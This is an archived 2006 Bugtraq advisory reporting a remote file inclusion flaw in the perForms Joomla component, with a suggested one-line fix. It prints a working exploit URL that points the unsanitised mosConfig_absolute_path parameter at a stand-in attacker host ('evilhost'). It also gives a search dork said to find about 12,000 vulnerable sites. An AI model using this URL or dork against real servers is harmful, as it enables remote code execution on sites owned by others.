lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 13 Jul 2006 19:34:00 -0000
From: endeneu@...uxmail.com
To: bugtraq@...urityfocus.com
Subject: perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion


---------------------------------------------------------------------------
 perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---------------------------------------------------------------------------

 Remote : Yes
 Critical Level : High

 Vuln founded in a log file: lazy 0day!!! :D



 Description:
 ~~~~~~~~~~~~

 Application :  perForms Joomla Component
 Version : latest version [1.0]
 URL : http://forge.joomla.org/sf/projects/performs

 Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on 

 in /components/com_performs/com_performs/performs.php on lines 6-10

 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" );
 require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php");


 Exploit:
 ~~~~~~~~
 
 dork: inurl:"com_performs" -> founds ~12.000 sites (!)

 http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost


 Fix
 ~~~~

 Add before code:

 defined('_VALID_MOS') or die('Direct access to this location is not allowed.');


 Thx
 ~~~~

 Who works for better code and better life!


----------------------------------------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ